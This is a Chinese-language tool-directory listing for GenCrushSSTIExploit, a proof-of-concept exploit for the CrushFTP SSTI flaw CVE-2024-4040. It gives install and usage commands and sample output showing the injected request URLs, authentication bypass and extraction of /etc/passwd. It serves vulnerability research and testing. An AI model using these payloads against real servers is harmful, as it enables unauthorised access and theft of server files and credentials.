Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GenCrushSSTIExploit — 是CVE-2024-4040的PoC,用于利用CrushFTP中的SSTI漏洞。 | Kitploit
工具/GitHubGitHub/geniuszly/gencrushsstiexploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

是CVE-2024-4040的PoC,用于利用CrushFTP中的SSTI漏洞。

查看仓库
811年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GenCrushSSTIExploit 是一个针对 CrushFTP 中 SSTI(服务器端模板注入)漏洞(CVE-2024-4040)的 PoC 利用工具。此工具展示了如何利用此漏洞,仅供教育和道德黑客目的使用。

功能特点

  • 与 CrushFTP 服务器建立会话以提取认证 cookie。
  • 利用 SSTI 漏洞注入载荷。
  • 尝试绕过认证并从服务器提取敏感文件。
  • 使用 rich 实现美观且样式化的控制台输出。

免责声明

⚠️ 请负责任地使用此工具!它仅用于研究和教育目的。作者不对因使用此工具造成的任何滥用或损害负责。

安装

前提条件

  • Python 3.7+
  • pip(Python 包管理工具)

克隆仓库

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

安装所需包

root@kitploit:~
pip install -r requirements.txt

使用方法

基本命令

root@kitploit:~
python GenCrushSSTIExploit.py -t <目标URL>
  • -t / --target:指定存在漏洞的 CrushFTP 服务器的目标 URL。

可选参数

  • -l / --lfi:本地文件包含。指定要提取的文件。
  • -w / --wordlist:指定用于暴力破解文件路径的字典。

示例

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

示例输出

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
下载工具